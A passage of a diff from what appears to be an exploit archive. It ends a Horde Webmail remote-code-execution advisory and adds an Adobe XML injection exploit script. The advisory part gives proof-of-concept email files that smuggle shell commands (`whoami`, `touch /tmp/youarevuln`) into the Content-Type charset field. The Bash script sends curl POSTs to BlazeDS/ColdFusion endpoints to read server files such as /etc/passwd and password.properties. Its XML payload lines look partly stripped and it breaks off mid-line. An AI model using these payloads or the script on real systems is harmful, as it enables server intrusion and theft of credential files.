$part2->setMetadata(self::SIG_RAW, implode("\n", +$val['data']) . "\n" . implode("\n", $sig['data'])); +/* 222 */ +/* 223 */ $part->addPart($part1); +/* 224 */ $part->addPart($part2); +/* 225 */ $new_part->addPart($part); +/* 226 */ +/* 227 */ next($parts); +/* 228 */ } +/* 229 */ } +/* 230 */ } +/* 231 */ +/* 232 */ return $new_part; +/* 233 */ } + +It is called from _parsePGP(): + +Path – /imp/lib/Mime/Viewer/Plain.php + +× +1 +2 +3 +4 +5 +6 +7 +8 +/* 239 */ protected function _parsePGP() +/* 240 */ { +/* 241 */ $part = +$GLOBALS['injector']->getInstance('Horde_Crypt_Pgp_Parse')->parseToPart( +/* 242 */ new Horde_Stream_Existing(array( +/* 243 */ 'stream' => $this->_mimepart->getContents(array('stream' => true)) +/* 244 */ )), +/* 245 */ $this->_mimepart->getCharset() +/* 246 */ ); + +Our charset value is taken from CHARSET attribute of Content-Type +header of parent MIMEpart. + +_parsePGP() is used in _getEmbeddedMimeParts() method and from Horde +Webmail ver 5.2.0 it looks like: + +Path – /imp/lib/Mime/Viewer/Plain.php + +/* 222 */ protected function _getEmbeddedMimeParts() +/* 223 */ { +/* 224 */ $ret = $this->getConfigParam('pgp_inline') +/* 225 */ ? $this->_parsePGP() +/* 226 */ : null; + +We can see an additional requirement – our function will be called +only if ‘pgp_inline‘ config parameter is “true”. It is defined in: + +Path – /imp/config/mime_drivers.php + +/* 37 */ /* Scans the text for inline PGP data. If true, will strip this data +/* 38 */ * out of the output (and, if PGP is active, will display the +/* 39 */ * results of the PGP action). */ +/* 40 */ 'pgp_inline' => false + +Default value is false, so the major part of Horde servers is not +vulnerable and our attack is relevant only if an admin manually has +changed this line to ‘pgp_inline‘ => true. + +But in older versions (before 5.2.0) the code of +_getEmbeddedMimeParts() is a bit different: + +Path – /imp/lib/Mime/Viewer/Plain.php + +/* 227 */ protected function _getEmbeddedMimeParts() +/* 228 */ { +/* 229 */ $ret = null; +/* 230 */ +/* 231 */ if (!empty($GLOBALS['conf']['gnupg']['path']) && +/* 232 */ $GLOBALS['prefs']->getValue('pgp_scan_body')) { +/* 233 */ $ret = $this->_parsePGP(); +/* 234 */ } + +So instead of requirement to have config parameter we have requirement +of ‘pgp_scan_body‘ Preference of current user. And it is more likely +to find a victim with needed preferences. We saw where our injected +command is executed and from where and when it is taken + +During rendering of massage we: + +Will parse PGP values: + +#0 IMP_Mime_Viewer_Plain->_parsePGP() called at +[/imp/lib/Mime/Viewer/Plain.php:225] +#1 IMP_Mime_Viewer_Plain->_getEmbeddedMimeParts() called at +[/Horde/Mime/Viewer/Base.php:298] +#2 Horde_Mime_Viewer_Base->getEmbeddedMimeParts() called at +[/imp/lib/Contents.php:1114] +#3 IMP_Contents->_buildMessage() called at [/imp/lib/Contents.php:1186] +#4 IMP_Contents->getContentTypeMap() called at [/imp/lib/Contents.php:1423] +#5 IMP_Contents->getInlineOutput() called at +[/imp/lib/Ajax/Application/ShowMessage.php:296] + +Will use them in: + +#0 IMP_Mime_Viewer_Plain->_parsePGP() called at +[/imp/lib/Mime/Viewer/Plain.php:225] +#0 IMP_Mime_Viewer_Pgp->_renderInline() called at +[/Horde/Mime/Viewer/Base.php:156] +#1 Horde_Mime_Viewer_Base->render() called at [/Horde/Mime/Viewer/Base.php:207] +#2 Horde_Mime_Viewer_Base->_renderInline() called at +[/Horde/Mime/Viewer/Base.php:156] +#3 Horde_Mime_Viewer_Base->render() called at [/imp/lib/Contents.php:654] +#4 IMP_Contents->renderMIMEPart() called at [/imp/lib/Contents.php:1462] +#5 IMP_Contents->getInlineOutput() called at +[/imp/lib/Ajax/Application/ShowMessage.php:296]] + +In conclusions: + +If Horde server has vulnerable configuration: + +Enabled “GnuPG feature” (there is path to gpg binary in +$conf[gnupg][path] setting) +Only for ver 5.2.0 and newer: ‘pgp_inline’ => true, in +/imp/config/mime_drivers.php + +And the victim has checked the next checkbox in his/her preferences ( +“PGP Configure PGP encryption support.” in Prefferences->Mail) : + +“Enable PGP functionality” +“Should PGP signed messages be automatically verified when viewed?” if +it is not checked our command will be executed when the victim clicks +on the link “Click HERE to verify the message.” +For versions before 5.2.0: “Should the body of plaintext message be +scanned for PGP data” + +An attacker can create email with PGP data, put desired command into +CHARSET attribute of ContentType header, and this command will be +executed on Horde server when the victim opens this email. + +Proof of Concept – Remote Code Execution + +For Proof of Concept we can use preconfigured image of Horde server +from Bitnami (Bitnami – “Easy to use cloud images, containers, and VMs +that work on any platform”): + +https://downloads.bitnami.com/files/stacks/horde/5.2.17-0/bitnami-horde-5.2.17-0-linux-ubuntu-14.04-x86_64.ova + +Step 1 – Login as admin (by default user:bitnami) and go to +Administration -> Configuration and choose Horde (horde). Open GnuPG +tab, enter /usr/bin/gpg into $conf[gnupg][path] setting and click +“Generate Horde Configuration“: + +Now we have enabled GPG feature on our server and we can login as +regular user and try to execute desired commands. But Bitnami image +does not have installed and configured Mail server so we need to use +external one or install it on local machine. + +We will use gmail account (to be able to login to it from Horde I had +to change Gmail account setting Allow less secure apps: ON). + +To use external Mail server we need to change the next setting: +“Administrator Panel” -> “Configuration” -> “Horde” -> +“Authentication” + +Configure the application authentication ($conf[auth][driver]) – +change this option to “Let a Horde application handle authentication” +and click “Generate Horde Configuration”. + +If we have Horde Webmail ver 5.2.0 or newer we need to edit +/imp/config/mime_drivers.php file. Login to the console of bitnami +image (default bitnami:bitnami) and run the next command: + +sudo nano /opt/bitnami/apps/horde/htdocs/imp/config/mime_drivers.php + +Change the line: “‘pgp_inline’ => false” to “‘pgp_inline’ => true” and +save the changes. + +Step 2 – Logout and login with your gmail account. + +Step 3 – Go to Preferences -> Mail and click on PGP link: + +Check Enable PGP functionality checkbox and click “Save” +Check Should PGP signed messages be automatically verified when viewed checkbox +For versions before 5.2.0 check “Should the body of plain-text message +be scanned for PGP data” checkbox Click “Save” + +For version before 5.2.0: + +Step 4 – Go to the Mail, take any mail folder (for example Drafts), +and chose “Import” item from context menu and import attack_whoami.eml +file (in the end of this blog). + +Click on the imported email: + +Our Horde serve is launched under daemon user + +Step 5 – We can do the same with attack_touch.eml (in the end of this +blog) file (import it and click on the new mail) and check /tmp +folder: + +attack_touch.eml + +Date: Fri, 04 Nov 2016 16:04:19 +0000 +Message-ID: <20161104160419.Horde.HpYObg_3-4QS-nUzWujEkg3@ubvm.mydomain.com> +From: Donald Trump +To: SomeUser@mydoamin.com +Subject: PGP_INLine_touch_tmp_youarevuln +X-IMP-Draft: Yes +Content-Type: text/plain; CHARSET="US-ASCII`touch /tmp/youarevuln`"; +format=flowed; DelSp=Yes +MIME-Version: 1.0 +Content-Disposition: inline + + +-----BEGIN PGP SIGNED MESSAGE----- +Hash: SHA1 + +This is a sample of a clear signed message. + +-----BEGIN PGP SIGNATURE----- +Version: 2.6.2 + +iQCVAwUBMoSCcM4T3nOFCCzVAQF4aAP/eaP2nssHHDTHyPBSjgwyzryguwBd2szF +U5IFy5JfU+PAa6NV6m/UWW8IKczNX2cmaKQNgubwl3w0odFQPUS+nZ9myo5QtRZh +DztuhjzJMEzwtm8KTKBnF/LJ9X05pSQUvoHfLZ/waJdVt4E/xfEs90l8DT1HDdIz +CvynscaD+wA= +=Xb9n +-----END PGP SIGNATURE----- + +attack_whoami.eml + +Date: Fri, 04 Nov 2016 16:04:19 +0000 +Message-ID: <20161104160419.Horde.HpYObg_3-4QS-nUzWujEkg3@ubvm.mydomain.com> +From: Donald Trump +To: SomeUser@mydoamin.com +Subject: PGP_INLine_whoami +X-IMP-Draft: Yes +Content-Type: text/plain; CHARSET=US-ASCII`whoami`; format=flowed; DelSp=Yes +MIME-Version: 1.0 +Content-Disposition: inline + + +-----BEGIN PGP SIGNED MESSAGE----- +Hash: SHA1 + +This is a sample of a clear signed message. + +-----BEGIN PGP SIGNATURE----- +Version: 2.6.2 + +iQCVAwUBMoSCcM4T3nOFCCzVAQFJaAP/eaP2nssHHDTHyPBSjgwyzryguwBd2szF +U5IFy5JfU+PAa6NV6m/UWW8IKczNX2cmaKQNgubwl3w0odFQPUS+nZ9myo5QtRZh +DztuhjzJMEzwtm8KTKBnF/LJ9X05pSsUvoHfLZ/waJdVt4E/xfEs90l8DT1HDdIz +CvynscaD+wA= +=Xb9n +-----END PGP SIGNATURE----- \ No newline at end of file diff --git a/platforms/xml/webapps/41855.sh b/platforms/xml/webapps/41855.sh new file mode 100755 index 000000000..2c81c5dc2 --- /dev/null +++ b/platforms/xml/webapps/41855.sh @@ -0,0 +1,228 @@ +#!/bin/bash +# +# Source: https://raw.githubusercontent.com/tsluyter/exploits/master/adobe_xml_inject.sh +# Exploit Title: Adobe XML Injection file content disclosure +# Date: 07-04-2017 +# Exploit Author: Thomas Sluyter +# Website: https://www.kilala.nl +# Vendor Homepage: http://www.adobe.com/support/security/bulletins/apsb10-05.html +# Version: Multiple Adobe products +# Tested on: Windows Server 2003, ColdFusion 8.0 Enterprise +# CVE : 2009-3960 +# +# Shell script that let's you exploit a known XML injection vulnerability +# in a number of Adobe products, allowing you to read files that are otherwise +# inaccessible. In Metasploit, this is achieved with auxiliary:scanner:adobe_xml_inject +# This script is a Bash implementation of the PoC multiple/dos/11529.txt. +# +# According to the original Metasploit code, this attack works with: +# "Multiple Adobe Products: BlazeDS 3.2 and earlier versions, +# LiveCycle 9.0, 8.2.1, and 8.0.1, LiveCycle Data Services 3.0, 2.6.1, +# and 2.5.1, Flex Data Services 2.0.1, ColdFusion 9.0, 8.0.1, 8.0, and 7.0.2" +# + + +PROGNAME="$(basename $0)" # This script +TIMESTAMP=$(date +%y%m%d%H%M) # Used for scratchfiles +SCRATCHFILE="/tmp/${PROGNAME}.${TIMESTAMP}" # Used as generic scratchfile +EXITCODE="0" # Assume success, changes on errors +CURL="/usr/bin/curl" # Other locations are detected with "which" + +SSL="0" # Overridden by -s +DEBUG="0" # Overridden by -d +BREAKFOUND="0" # Overridden by -b +TARGETHOST="" # Overridden by -h +TARGETPORT="8400" # Overridden by -p +READFILE="/etc/passwd" # Overridden by -f + + +################################## OVERHEAD SECTION +# +# Various functions for overhead purposes. +# + +# Defining our own logger function, so we can switch between stdout and syslog. +logger() { + LEVEL="$1" + MESSAGE="$2" + + # You may switch the following two, if you need to log to syslog. + #[[ ${DEBUG} -gt 0 ]] && echo "${LEVEL} $MESSAGE" || /usr/bin/logger -p ${LEVEL} "$MESSAGE" + [[ ${DEBUG} -gt 0 ]] && echo "${LEVEL} $MESSAGE" || echo "${LEVEL} $MESSAGE" +} + + +ExitCleanup() { + EXITCODE=${1} + rm -f ${SCRATCHFILE}* >/dev/null 2>&1 + echo "" + exit ${EXITCODE} +} + + +# Many thanks to http://www.linuxjournal.com/content/validating-ip-address-bash-script +ValidIP() { + local IP=${1} + local STAT=1 + + if [[ ${IP} =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]] + then + OIFS=$IFS; IFS='.' + IP=(${IP}) + IFS=$OIFS + [[ (${IP[0]} -le 255) && (${IP[1]} -le 255) && (${IP[2]} -le 255) && (${IP[3]} -le 255) ]] + stat=$? + fi + return $stat +} + + +# Function to output help information. +show-help() { + echo "" + cat << EOF + ${PROGNAME} [-?] [-d] [-s] [-b] -h host [-p port] [-f file] + + -? Show this help message. + -d Debug mode, outputs more kruft on stdout. + -s Use SSL / HTTPS, instead of HTTP. + -b Break on the first valid answer found. + -h Target host + -p Target port, defaults to 8400. + -f Full path to file to grab, defaults to /etc/passwd. + + This script exploits a known vulnerability in a set of Adobe applications. Using one + of a few possible URLs on the target host (-h) we attempt to read a file (-f) that is + normally inaccessible. + + NOTE: Windows paths use \\, so be sure to properly escape them when using -f! For example: + ${PROGNAME} -h 192.168.1.20 -f c:\\\\coldfusion8\\\\lib\\\\password.properties + ${PROGNAME} -h 192.168.1.20 -f 'c:\\coldfusion8\\lib\\password.properties' + + This script relies on CURL, so please have it in your PATH. + +EOF +} + + +# Parsing and verifying the passed parameters. +OPTIND=1 +while getopts "?dsbh:p:f:" opt; do + case "$opt" in + \?) show-help; ExitCleanup 0 ;; + d) DEBUG="1" ;; + s) SSL="1" ;; + b) BREAKFOUND="1" ;; + h) [[ -z ${OPTARG} ]] && (show-help; ExitCleanup 1) + ValidIP ${OPTARG}; if [[ $? -eq 0 ]] + then TARGETHOST=${OPTARG} + else TARGETHOST=$(nslookup ${OPTARG} | grep ^Name | awk '{print $2}') + [[ $? -gt 0 ]] && (logger ERROR "Target host ${TARGETHOST} not found in DNS."; ExitCleanup 1) + fi ;; + p) [[ -z ${OPTARG} ]] && (show-help; ExitCleanup 1) + if [[ ! -z $(echo ${OPTARG} | tr -d '[:alnum:]') ]] + then logger ERROR "Target port ${OPTARG} is incorrect."; ExitCleanup 1 + else TARGETPORT=${OPTARG} + fi ;; + f) [[ -z ${OPTARG} ]] && (show-help; ExitCleanup 1) + if [[ (-z $(echo ${OPTARG} | grep ^\/)) && (-z $(echo ${OPTARG} | grep ^[a-Z]:)) ]] + then logger ERROR "File is NOT specified with full Unix or Windows path."; ExitCleanup 1 + else READFILE=${OPTARG} + fi ;; + *) show-help; ExitCleanup 0 ;; + esac +done + +[[ $(which curl) ]] && CURL=$(which curl) || (logger ERROR "CURL was not found."; ExitCleanup 1) +[[ -z ${TARGETHOST} ]] && (logger ERROR "Target host was not set."; ExitCleanup 1) + +[[ ${DEBUG} -gt 0 ]] && logger DEBUG "Proceeding with host/port/file: ${TARGETHOST},${TARGETPORT},${READFILE}." + + +################################## GETTING TO WORK +# +# + +PATHLIST=("/flex2gateway/" "/flex2gateway/http" "/flex2gateway/httpsecure" \ + "/flex2gateway/cfamfpolling" "/flex2gateway/amf" "/flex2gateway/amfpolling" \ + "/messagebroker/http" "/messagebroker/httpsecure" "/blazeds/messagebroker/http" \ + "/blazeds/messagebroker/httpsecure" "/samples/messagebroker/http" \ + "/samples/messagebroker/httpsecure" "/lcds/messagebroker/http" \ + "/lcds/messagebroker/httpsecure" "/lcds-samples/messagebroker/http" \ + "/lcds-samples/messagebroker/httpsecure") + +echo "" > ${SCRATCHFILE} +echo " ]>" >> ${SCRATCHFILE} +echo "" >> ${SCRATCHFILE} +echo "" >> ${SCRATCHFILE} +echo "bodyclientIdcorrelationIddestination" >> ${SCRATCHFILE} +echo "headersmessageIdoperationtimestamp" >> ${SCRATCHFILE} +echo "timeToLive" >> ${SCRATCHFILE} +echo "DSIdDSMessagingVersionnil" >> ${SCRATCHFILE} +echo "1&x3;500" >> ${SCRATCHFILE} + +if [[ ${DEBUG} -gt 0 ]] +then + logger DEBUG "XML file sent to target host reads as follows:" + echo "======================================" + cat ${SCRATCHFILE} + echo "======================================" + echo "" +fi + +let CONTENTLENGTH=$(wc -c ${SCRATCHFILE} | awk '{print $1}')-1 + +for ADOBEPATH in "${PATHLIST[@]}" +do + [[ ${SSL} -gt 0 ]] && PROTOCOL="https" || PROTOCOL="http" + URI="${PROTOCOL}://${TARGETHOST}:${TARGETPORT}${ADOBEPATH}" + + [[ ${DEBUG} -gt 0 ]] && logger DEBUG "Proceeding with URI: ${URI}" + + # Header contents based on a tcpdump capture of original exploit being + # run from Metasploit. + HEADER="-H \"Host: ${TARGETHOST}\" -H \"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\" -H \"Content-Type: application/x-www-form-urlencoded\" -H \"Content-Length: ${CONTENTLENGTH}\"" + + CURLPOST="${CURL} -X POST -k -s --http1.1 ${HEADER} -w \"%{http_code}\" -d @- ${URI}" + + [[ ${DEBUG} -gt 0 ]] && logger DEBUG "Using this CURL command: ${CURLPOST}" + + # The tr command dikes out any non-ASCII characters which might mess with output. + CURLOUTPUT=$(cat ${SCRATCHFILE} | ${CURLPOST} | tr -cd '\11\12\15\40-\176' 2>&1) + + # Output is pretty garbled and the HTTP return code is enclosed in double quotes. + # I need to grab the last 5 chars (includes NULL EOF) and remove the ". + CURLCODE=$(echo ${CURLOUTPUT} | tail -c5 | tr -cd [:digit:]) + + if [[ ${DEBUG} -gt 0 ]] + then + logger DEBUG "CURL was given this HTTP return code: ${CURLCODE}." + logger DEBUG "Output from CURL reads as follows:" + echo "======================================" + echo "${CURLOUTPUT}" + echo "======================================" + echo "" + fi + + logger INFO "${CURLCODE} for ${URI}" + + if [[ (${CURLCODE} -eq 200) && (! -z $(echo ${CURLOUTPUT} | grep "